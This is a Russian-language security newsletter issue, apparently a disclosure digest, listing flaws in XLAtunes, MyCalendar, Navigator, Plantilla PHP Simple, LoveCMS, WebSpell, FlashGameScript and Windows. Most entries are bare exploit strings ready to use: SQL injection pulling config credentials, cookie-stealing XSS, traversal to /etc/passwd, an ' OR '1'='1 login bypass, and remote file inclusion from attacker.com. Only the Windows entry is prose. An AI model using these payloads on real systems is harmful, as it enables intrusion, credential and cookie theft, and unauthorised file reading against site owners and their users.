Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в XLAtunes, MyCalendar,


Компьютер для продвинутых пользователей
В этом выпуске:
XLAtunes | MyCalendar | Microsoft Windows | Navigator Directory Traversal Vulnerability | Plantilla PHP Simple | LoveCMS | WebSpell | FlashGameScript
ПО: XLAtunes
Версия: 0.1

Использование:
http://host.com/path/?mode=view&album=-1%20UNION%20SELECT%20confkey%20FROM%20config/*
#confkey->Password
#confvalue->Username

ПО: MyCalendar

Использование:
http://www.target.ma/calendar/index.php?go="><script>alert(document.cookie)</script>
ПО: Microsoft Windows
Версия: 2000/XP/2003/Vista

Уязвимость:
Это очень простой пример ещё одной интересной уязвимости.ReadDirectoryChangesW() API разрешает приложениям просматривать выбранные директори в реальном времени. Параметр WatchSubtree этой функции разрешает просматривать внутри целого дерева директории совместно с просматриваемой директоией. При присмотри выбранная директория должно быть открыта через LIST (READ) доступ. Функция возвращения списка модифицированный файлов с типом модификации.
ReadDirectoryChangesW() не проверяется, что даёт возможность вернуть инормацию об объектах пользователя не имея LIST доступа. Любой непривелигированный пользователь с LIST доступом к родительской директории может просматривать любые файлы в дочерних директориях. Поскольку по-умолчанию в Windows обновление время доступа для любого доступа к файлам на NTFS различно, это даёт возможность для пользователей собрать информацию о NTFS-защищённых файлов, их именах и времени доступа к ним.
ПО: Navigator Directory Traversal Vulnerability
Версия: 2.0
Сайт: http://www.jeunes-webmasters.com/

Использование:
v1.0 http://www.target/[gallery directory]/pn-menu.php?ret=Pics%20Navigator&dir=../../../
v2.0 http://www.target.ma/jwpn-photos.php?dir=../../../

ПО: Plantilla PHP Simple

Уявзимость:
Возможен локальный инклуд.
Использование:
/zadminxx/list_main_pages.php?nfolder=/etc/
ПО: LoveCMS
Версия: 1.4

Исользование:
/lovecms/install/index.php?step=http://site.com/boum.txt?
/lovecms/install/index.php?step=/etc/passwd%00
/lovecms/?load=../../../../../../../../../../etc/passwd%00
/modules/content/pictures/tmp/
/lovecms/?load=content&iamp;d='</textarea>'"><script>alert(document.cookie)</script>

ПО: WebSpell
Версия: 4.0

Использование:
В поле ввода пароля и ID пишем: 1;' OR '1'='1
ПО: FlashGameScript
Версия: 1.5.4

Использование:
http://www.target.com/index.php?func=http://attacker.com/evil_script?
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru
Отблагодорить: WM - R407426923581

В избранное